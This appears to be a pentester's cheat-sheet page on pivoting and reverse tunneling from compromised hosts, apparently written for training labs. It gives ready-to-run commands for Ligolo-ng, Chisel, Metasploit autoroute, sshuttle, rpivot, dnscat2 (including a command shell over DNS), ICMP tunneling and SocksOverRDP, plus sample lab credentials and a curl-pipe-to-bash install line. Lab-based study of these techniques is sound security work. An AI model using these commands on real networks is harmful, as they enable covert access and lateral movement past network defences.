reverse-tunneling

Ligolo-ng - Socks tunneling (best for multiple sessions)

#ligolo

sudo ip tuntap add user "$USER" mode tun ligolo && sudo ip link set ligolo up

proxy -selfcert

nohup ./agent -connect 10.10.16.97:11601 -ignore-cert  &              #linux

start .\agent.exe '-connect 10.10.1.130:11601 -ignore-cert'           #windowsCMD

Start-Process ".\agent.exe" -ArgumentList "-connect 10.10.1.130:11601 -ignore-cert" -NoNewWindow                                                           #windowsPS

ligolo-ng> session

ligolo-ng> 1

sudo ip route add 192.168.148.0/24 dev ligolo

ligolo-ng> start

Chisel - Socks5 tunneling (Reverse)

It is useful when we want to access the host & multiple ports that cannot be directly accessible from local machine (when kali is not able to reach target machine). #chisel

On kali machine

chisel server -v -p 11601 --socks5 --reverse

Run client chisel (compromised host)

nohup ./chisel client -v <compromised_host_ip>:8000 R:socks &

Start-Process ".\chisel.exe" -ArgumentList "client -v 10.10.16.39:8000 R:socks" -NoNewWindow

Modify proxychains.conf file

socks5 127.0.0.1 1080

Access DC

proxychains xfreerdp /v:<third_machine_ip> /u:victor /p:pass@123

Chisel - Socks5 tunneling

Minimize chisel size

Run chisel (compromised host)

Windows:

start .\chisel.exe 'server -v -p 8000 --socks5'

Powershell

Start-Process ".\chisel.exe" -ArgumentList "server -v -p 8000 --socks5" -NoNewWindow

Linux

nohup ./chisel server -v -p 8000 --socks5 &

Run client chisel (kali host)

Windows

start .\chisel.exe 'client -v <compromised_host>:8000 socks'

Powershell

Start-Process ".\chisel.exe" -ArgumentList "client -v <compromised_host>:8000 socks" -NoNewWindow

Linux

./chisel client -v <compromised_host>:8000 socks

Modify proxychains.conf file

socks5 127.0.0.1 1080

Access DC

proxychains xfreerdp /v:<third_machine_ip> /u:victor /p:pass@123

Metasploit - Reverse pivoting (without root)

use auxiliary/server/socks_proxy

set SRVPORT 9050

set SRVHOST 0.0.0.0

set version 4a; exploit

Configure proxychains.conf to route traffic generated by other tools like nmap

socks4 127.0.0.1 9050

MSF session - Create routes with AutoRoute

use post/multi/manage/autoroute

set session 1

set subnet 172.16.5.0 (third_machine_ip>; exploit

OR

run autoroute -s 172.16.5.0/23 (third_machine_ip)

MSF session - Listing active routes with autoroute

run autoroute -p

Test proxy & routing functionality

proxychains nmap <third_target_machine>  -p3389 -sT -v -Pn

SShuttle - SSH pivoting (you can use any tool without using proxychains)

Running sshuttle (attacker machine)

sudo sshuttle -r ubuntu@<compromised_host_ip> 172.16.5.0/23 -v

Scanning third_machine with nmap

nmap -v -sV -p3389 172.16.5.19 -A -Pn

rpivot - Web server pivoting (reverse SOCKS proxy tool)

Install tool

git clone https://github.com/klsecservices/rpivot.git

sudo apt install python2.7

Alternative installation of python2.7

curl [https://pyenv.run](https://pyenv.run/) | bash

echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc

echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc

echo 'eval "$(pyenv init -)"' >> ~/.bashrc

source ~/.bashrc

pyenv install 2.7

Run server.py from attacker host

python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Transfer tool to pivot host (compromised host - transfer directory)

scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Run client.py from compromised host

python2.7 client.py --server-ip <attacker_host_ip> --server-port 9999

Browser target webserver using proxychains

proxychains firefox-esr <third_machine_ip>:80

Connect to a web server using HTTP-Proxy & NTLM Auth

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

DNScat2 - DNS tunneling

Download dnscat2

git clone https://github.com/iagox86/dnscat2.git && cd dnscat2/server/ && sudo gem install bundler && sudo bundle install

Start dnscat2 server

sudo ruby dnscat2.rb --dns host=<compromised_host_ip>,port=53,domain=inlanefreight.local --no-cache

Download dnscat2-powershell

wget https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/refs/heads/master/dnscat2.ps1

Import dnscat2.ps1

Import-Module .\dnscat2.ps1

Run dnscat2.ps1

Start-Dnscat2 -DNSServer 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <secret_key> -Exec cmd

Listing dnscat2 options

?
Window -i 1

ICMP - Tunneling with socks

Download & build ptunnel-ng

git clone https://github.com/utoni/ptunnel-ng.git && cd ptunnel-ng && sudo ./autogen.sh

Transfer ptunnel-ng binary to the compromised host

Start ptunnel-ng server (compromised host)

-r IP should be reachable form the attacker box

sudo ./ptunnel-ng -r<compromised_host_ip> -R22

Connect to the ptunnel-ng (attacker host)

sudo ./ptunnel-ng -p<compromised_host_ip> -l2222 -r10.129.202.64 -R22

Connect SSH connection via ICMP tunnel

ssh -p2222 -lubuntu 127.0.0.1

Enable dynamic port forwarding over SSH

ssh -D 9050 -p2222 -lubuntu 127.0.0.1

Proxychaining through ICMP tunnel

proxychains nmap -sV -sT 172.16.5.19 -p3389

Understand working of this tool properly, analysis the traffic generated by this tool using wireshark.

SocksOverRDP - RDP and SOCKS tunneling

Download appropriate binaries

https://github.com/nccgroup/SocksOverRDP/releases

Load SocksOverRDP.dll (Host A)

It will listen on port:1080

regsvr32.exe SocksOverRDP-Plugin.dll

Now transfer the socksoverrdp-server.exe to "Host B"

python3 -m http.server

On the host B

.\socksoverrdp-server.exe

Checking connection (compromised host A)

netstat -antb | findstr 1080

Configure Proxifier on initial foothold host

Add profile > Socks5 127.0.0.1 1080

With Proxifier configured and running, we can start mstsc.exe, and it will use Proxifier to pivot all our traffic via 127.0.0.1:1080, which will tunnel it over RDP to 172.16.5.19, which will then route it to 172.16.6.155 using SocksOverRDP-server.exe.

Connect RDP (initial foothold host)

Use windows native RDP client

Previousreverse-port-forwarding NextSOCAT redirection with a reverse shell

Last updated 21 hours ago

hashtagLigolo-ng - Socks tunneling (best for multiple sessions)

hashtagChisel - Socks5 tunneling (Reverse)

hashtagChisel - Socks5 tunneling

hashtagMetasploit - Reverse pivoting (without root)

hashtagSShuttle - SSH pivoting (you can use any tool without using proxychains)

hashtagrpivot - Web server pivoting (reverse SOCKS proxy tool)

hashtagDNScat2 - DNS tunneling

hashtagICMP - Tunneling with socks

hashtagSocksOverRDP - RDP and SOCKS tunneling